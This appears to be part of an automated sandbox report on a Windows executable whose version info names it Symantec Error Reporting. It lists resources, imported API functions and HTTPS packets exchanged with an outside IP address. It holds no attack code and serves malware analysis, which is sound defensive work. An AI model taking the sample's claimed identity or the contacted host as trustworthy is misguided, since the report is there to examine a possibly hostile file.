RT_ICON       | 0xf9a08  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xf9e70  | 0x668   | data | English | United States
RT_ICON       | 0xfa4d8  | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0xfa7c0  | 0x1e8   | data | English | United States
RT_ICON       | 0xfa9a8  | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xfaad0  | 0xea8   | data | English | United States
RT_ICON       | 0xfb978  | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0xfc220  | 0x6c8   | data | English | United States
RT_ICON       | 0xfc8e8  | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xfce50  | 0x25a8  | data | English | United States
RT_ICON       | 0xff3f8  | 0x10a8  | data | English | United States
RT_ICON       | 0x1004a0 | 0x988   | data | English | United States
RT_ICON       | 0x100e28 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x101290 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
RT_ICON       | 0x1136b8 | 0x4c28  | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
RT_ICON       | 0x1182e0 | 0x4228  | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
RT_ICON       | 0x11c508 | 0x25a8  | data | English | United States
RT_ICON       | 0x11eab0 | 0x10a8  | data | English | United States
RT_ICON       | 0x11fb58 | 0xeb0   | data | English | United States
RT_ICON       | 0x120a08 | 0x988   | data | English | United States
RT_ICON       | 0x121390 | 0x6b8   | data | English | United States
RT_ICON       | 0x121a48 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x121eb0 | 0x668   | data | English | United States
RT_ICON       | 0x122518 | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0x122800 | 0x1e8   | data | English | United States
RT_ICON       | 0x1229e8 | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x122b10 | 0xea8   | data | English | United States
RT_ICON       | 0x1239b8 | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0x124260 | 0x6c8   | data | English | United States
RT_ICON       | 0x124928 | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x124e90 | 0x25a8  | data | English | United States
RT_ICON       | 0x127438 | 0x10a8  | data | English | United States
RT_ICON       | 0x1284e0 | 0x988   | data | English | United States
RT_ICON       | 0x128e68 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x1292d0 | 0x668   | data | English | United States
RT_ICON       | 0x129938 | 0x2e8   | data | English | United States
RT_ICON       | 0x129c20 | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x129d48 | 0xea8   | data | English | United States
RT_ICON       | 0x12abf0 | 0x8a8   | data | English | United States
RT_ICON       | 0x12b498 | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x12ba00 | 0x452e  | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON       | 0x12ff30 | 0x25a8  | data | English | United States
RT_ICON       | 0x1324d8 | 0x10a8  | data | English | United States
RT_ICON       | 0x133580 | 0x988   | data | English | United States
RT_ICON       | 0x133f08 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x134370 | 0x668   | data | English | United States
RT_ICON       | 0x1349d8 | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0x134cc0 | 0x1e8   | data | English | United States
RT_ICON       | 0x134ea8 | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x134fd0 | 0xea8   | data | English | United States
RT_ICON       | 0x135e78 | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0x136720 | 0x6c8   | data | English | United States
RT_ICON       | 0x136de8 | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x137350 | 0x25a8  | data | English | United States
RT_ICON       | 0x1398f8 | 0x10a8  | data | English | United States
RT_ICON       | 0x13a9a0 | 0x988   | data | English | United States
RT_ICON       | 0x13b328 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x13b790 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
RT_ICON       | 0x14dbb8 | 0x4c28  | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
RT_ICON       | 0x1527e0 | 0x4228  | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
RT_ICON       | 0x156a08 | 0x25a8  | data | English | United States
RT_ICON       | 0x158fb0 | 0x10a8  | data | English | United States
RT_ICON       | 0x15a058 | 0xeb0   | data | English | United States
RT_ICON       | 0x15af08 | 0x988   | data | English | United States
RT_ICON       | 0x15b890 | 0x6b8   | data | English | United States
RT_ICON       | 0x15bf48 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x15c3b0 | 0x668   | data | English | United States
RT_ICON       | 0x15ca18 | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0x15cd00 | 0x1e8   | data | English | United States
RT_ICON       | 0x15cee8 | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x15d010 | 0xea8   | data | English | United States
RT_ICON       | 0x15deb8 | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0x15e760 | 0x6c8   | data | English | United States
RT_ICON       | 0x15ee28 | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x15f390 | 0x25a8  | data | English | United States
RT_ICON       | 0x161938 | 0x10a8  | data | English | United States
RT_ICON       | 0x1629e0 | 0x988   | data | English | United States
RT_ICON       | 0x163368 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x1637d0 | 0x668   | data | English | United States
RT_ICON       | 0x163e38 | 0x2e8   | data | English | United States
RT_ICON       | 0x164120 | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x164248 | 0xea8   | data | English | United States
RT_ICON       | 0x1650f0 | 0x8a8   | data | English | United States
RT_ICON       | 0x165998 | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x165f00 | 0x452e  | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON       | 0x16a430 | 0x25a8  | data | English | United States
RT_ICON       | 0x16c9d8 | 0x10a8  | data | English | United States
RT_ICON       | 0x16da80 | 0x988   | data | English | United States
RT_ICON       | 0x16e408 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x16e870 | 0x668   | data | English | United States
RT_ICON       | 0x16eed8 | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0x16f1c0 | 0x1e8   | data | English | United States
RT_ICON       | 0x16f3a8 | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x16f4d0 | 0xea8   | data | English | United States
RT_ICON       | 0x170378 | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0x170c20 | 0x6c8   | data | English | United States
RT_ICON       | 0x1712e8 | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x171850 | 0x25a8  | data | English | United States
RT_ICON       | 0x173df8 | 0x10a8  | data | English | United States
RT_ICON       | 0x174ea0 | 0x988   | data | English | United States
RT_ICON       | 0x175828 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x175c90 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
RT_ICON       | 0x1880b8 | 0x4c28  | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
RT_ICON       | 0x18cce0 | 0x4228  | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
RT_ICON       | 0x190f08 | 0x25a8  | data | English | United States
RT_ICON       | 0x1934b0 | 0x10a8  | data | English | United States
RT_ICON       | 0x194558 | 0xeb0   | data | English | United States
RT_ICON       | 0x195408 | 0x988   | data | English | United States
RT_ICON       | 0x195d90 | 0x6b8   | data | English | United States
RT_ICON       | 0x196448 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x1968b0 | 0x668   | data | English | United States
RT_ICON       | 0x196f18 | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0x197200 | 0x1e8   | data | English | United States
RT_ICON       | 0x1973e8 | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x197510 | 0xea8   | data | English | United States
RT_ICON       | 0x1983b8 | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0x198c60 | 0x6c8   | data | English | United States
RT_ICON       | 0x199328 | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x199890 | 0x25a8  | data | English | United States
RT_ICON       | 0x19be38 | 0x10a8  | data | English | United States
RT_ICON       | 0x19cee0 | 0x988   | data | English | United States
RT_ICON       | 0x19d868 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x19dcd0 | 0x668   | data | English | United States
RT_ICON       | 0x19e338 | 0x2e8   | data | English | United States
RT_ICON       | 0x19e620 | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x19e748 | 0xea8   | data | English | United States
RT_ICON       | 0x19f5f0 | 0x8a8   | data | English | United States
RT_ICON       | 0x19fe98 | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x1a0400 | 0x452e  | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON       | 0x1a4930 | 0x25a8  | data | English | United States
RT_ICON       | 0x1a6ed8 | 0x10a8  | data | English | United States
RT_ICON       | 0x1a7f80 | 0x988   | data | English | United States
RT_ICON       | 0x1a8908 | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_GROUP_ICON | 0x1a8d70 | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a8e20 | 0x84    | data | English | United States
RT_GROUP_ICON | 0x1a8ea4 | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a8f54 | 0xa0    | data | English | United States
RT_GROUP_ICON | 0x1a8ff4 | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a90a4 | 0x84    | data | English | United States
RT_GROUP_ICON | 0x1a9128 | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a91d8 | 0xa0    | data | English | United States
RT_GROUP_ICON | 0x1a9278 | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a9328 | 0x84    | data | English | United States
RT_GROUP_ICON | 0x1a93ac | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a945c | 0xa0    | data | English | United States
RT_GROUP_ICON | 0x1a94fc | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a95ac | 0x84    | data | English | United States
RT_GROUP_ICON | 0x1a9630 | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a96e0 | 0xa0    | data | English | United States
RT_GROUP_ICON | 0x1a9780 | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a9830 | 0x84    | data | English | United States
RT_GROUP_ICON | 0x1a98b4 | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a9964 | 0xa0    | data | English | United States
RT_GROUP_ICON | 0x1a9a04 | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a9ab4 | 0x84    | data | English | United States
RT_GROUP_ICON | 0x1a9b38 | 0xae    | data | English | United States
RT_GROUP_ICON | 0x1a9be8 | 0xa0    | data | English | United States
RT_VERSION    | 0x1a9c88 | 0x340   | data | English | United States
RT_VERSION    | 0x1a9fc8 | 0x2f8   | data | English | United States
RT_VERSION    | 0x1aa2c0 | 0x344   | data | English | United States
RT_VERSION    | 0x1aa604 | 0x318   | data | English | United States
RT_VERSION    | 0x1aa91c | 0x340   | data | English | United States
RT_VERSION    | 0x1aac5c | 0x2f8   | data | English | United States
RT_VERSION    | 0x1aaf54 | 0x344   | data | English | United States
RT_VERSION    | 0x1ab298 | 0x318   | data | English | United States
RT_VERSION    | 0x1ab5b0 | 0x340   | data | English | United States
RT_VERSION    | 0x1ab8f0 | 0x2f8   | data | English | United States
RT_VERSION    | 0x1abbe8 | 0x344   | data | English | United States
RT_VERSION    | 0x1abf2c | 0x318   | data | English | United States
RT_VERSION    | 0x1ac244 | 0x340   | data | English | United States
RT_VERSION    | 0x1ac584 | 0x2f8   | data | English | United States
RT_VERSION    | 0x1ac87c | 0x344   | data | English | United States
RT_VERSION    | 0x1acbc0 | 0x318   | data | English | United States
RT_VERSION    | 0x1aced8 | 0x340   | data | English | United States
RT_VERSION    | 0x1ad218 | 0x2f8   | data | English | United States
RT_VERSION    | 0x1ad510 | 0x344   | data | English | United States
RT_VERSION    | 0x1ad854 | 0x318   | data | English | United States
RT_VERSION    | 0x1adb6c | 0x340   | data | English | United States
RT_VERSION    | 0x1adeac | 0x2f8   | data | English | United States
RT_VERSION    | 0x1ae1a4 | 0x344   | data | English | United States
RT_VERSION    | 0x1ae4e8 | 0x318   | data | English | United States
RT_MANIFEST   | 0x1ae800 | 0x77d   | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators | English | United States
RT_MANIFEST   | 0x1aef80 | 0x245   | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators | English | United States
RT_MANIFEST   | 0x1af1c8 | 0x3ca   | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators | English | United States
RT_MANIFEST   | 0x1af594 | 0x7e5   | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators | English | United States
RT_MANIFEST   | 0x1afd7c | 0x77d   | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators | English | United States
RT_MANIFEST   | 0x1b04fc | 0x245   | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators | English | United States
RT_MANIFEST   | 0x1b0744 | 0x3ca   | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators | English | United States
                            RT_MANIFEST0x1b0b100x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b12f80x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b1a780x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b1cc00x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b208c0x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b28740x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b2ff40x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b323c0x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b36080x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b3df00x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b45700x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b47b80x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b4b840x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b536c0x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b5aec0x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b5d340x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b61000x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States

                            Imports

                            DLL  Import
                            advapi32.dll  RegDeleteKeyA, RegCreateKeyExA, RegQueryValueExA, RegCloseKey, RegEnumValueA, RegSetValueExA, RegDeleteValueA, RegEnumKeyA, RegOpenKeyExA
                            comctl32.dll  ImageList_Destroy, ImageList_AddMasked, ImageList_Create
                            gdi32.dll  GetDeviceCaps, SetBkColor, CreateBrushIndirect, CreateFontIndirectA, SetTextColor, SetBkMode, SelectObject, DeleteObject
                            kernel32.dll  GetCommandLineA, CreateThread, LoadLibraryExA, GetFullPathNameA, SetFileAttributesA, GlobalUnlock, WaitForSingleObject, GetTempPathA, GlobalAlloc, GetTempFileNameA, VirtualProtect, GetFileAttributesA, GetProcAddress, GetSystemDirectoryA, Sleep, SearchPathA, GlobalLock, GetPrivateProfileStringA, GetDiskFreeSpaceA, GetCurrentDirectoryA, MultiByteToWideChar, MulDiv, FindClose, lstrcpynA, GetVersion, MoveFileA, SetErrorMode, GetCurrentProcess, FindFirstFileA, GetShortPathNameA, ExpandEnvironmentStringsA, SetFilePointer, GetFileSize, lstrcmpiA, FreeLibrary, GetTickCount, RemoveDirectoryA, ReadFile, CreateDirectoryA, ExitProcess, FindNextFileA, SetCurrentDirectoryA, LoadLibraryA, SetFileTime, CreateFileA, lstrlenA, lstrcmpA, GetModuleHandleA, GetModuleFileNameA, DeleteFileA, WriteFile, CloseHandle, CompareFileTime, lstrcatA, GlobalFree, GetWindowsDirectoryA, WritePrivateProfileStringA, CopyFileA, CreateProcessA, GetExitCodeProcess, GetLastError
                            ole32.dll  CoTaskMemFree, OleInitialize, CoCreateInstance, OleUninitialize
                            shell32.dll  SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHGetSpecialFolderLocation, ShellExecuteA, SHFileOperationA
                            user32.dll  IsWindowVisible, DispatchMessageA, SendMessageTimeoutA, CreateWindowExA, GetClientRect, SetWindowPos, SystemParametersInfoA, LoadBitmapA, CharPrevA, EndPaint, DestroyWindow, EnableMenuItem, AppendMenuA, ShowWindow, SetWindowLongA, InvalidateRect, EnableWindow, OpenClipboard, EmptyClipboard, GetMessagePos, SendMessageA, ExitWindowsEx, IsWindowEnabled, BeginPaint, GetSysColor, PostQuitMessage, GetSystemMetrics, MessageBoxIndirectA, SetDlgItemTextA, EndDialog, SetClassLongA, GetDC, DefWindowProcA, CloseClipboard, GetDlgItemTextA, SetForegroundWindow, FillRect, LoadCursorA, CharNextA, IsWindow, GetSystemMenu, CreateDialogParamA, GetWindowRect, RegisterClassA, GetWindowLongA, DrawTextA, FindWindowExA, CheckDlgButton, TrackPopupMenu, wsprintfA, DialogBoxParamA, CreatePopupMenu, SetCursor, SetWindowTextA, ScreenToClient, LoadImageA, SetClipboardData

                            Exports

                            Name  Ordinal  Address
                            DllRegisterServer  1  0x1002513f

                            Version Infos

                            Description  Data
                            LegalCopyright  Copyright 2016 Symantec Corporation. All rights reserved.
                            InternalName  SymErr
                            FileVersion  7.6.2.5
                            CompanyName  Symantec Corporation
                            ProductName  Symantec Shared Component
                            ProductVersion  7.6
                            FileDescription  Symantec Error Reporting
                            OriginalFilename  SymErr.exe
                            Translation  0x0409 0x04b0

                            Possible Origin

                            Language of compilation system  Country where language is spoken
                            English  United States

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            Timestamp  Source Port  Dest Port  Source IP  Dest IP
                            Dec 14, 2021 10:21:39.186547995 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.186564922 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.187046051 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.187084913 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.187138081 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.187154055 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.187175989 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.187221050 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.188011885 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.188050032 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.188102007 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.188119888 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.188142061 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.188179016 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.188937902 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.188981056 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.189028978 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.189043999 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.189091921 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.189105034 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.195647001 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.208705902 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.208759069 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.208823919 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.208841085 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.208882093 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.208888054 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.208890915 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.209031105 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.209109068 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.209394932 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.209427118 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.209445000 CET49813443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.209458113 CET4434981379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.220905066 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.226923943 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.226979971 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.227076054 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.227619886 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.227648020 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.258375883 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.258434057 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.258536100 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.258575916 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.258680105 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.259692907 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.259748936 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.259808064 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.259835005 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.259850979 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.259903908 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.282447100 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.282505989 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.282553911 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.282582045 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.282601118 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.282658100 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.284025908 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.284064054 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.284125090 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.284142017 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.284174919 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.284919977 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.284960032 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.285021067 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.285038948 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.285053015 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.285933971 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.305588961 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.305641890 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.305763006 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.305788040 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.305818081 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.305897951 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.305903912 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.305944920 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.306397915 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.306437969 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.306490898 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.306508064 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.306539059 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.306572914 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.306974888 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.307017088 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.307080030 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.307096004 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.307112932 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.307187080 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.307637930 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.307673931 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.307723999 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.307743073 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.307774067 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.307801008 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.307817936 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.307898998 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.308372021 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.308706999 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.308746099 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.308808088 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.308830023 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.308851004 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.308887959 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.309483051 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.309523106 CET4434981479.110.52.144192.168.2.6
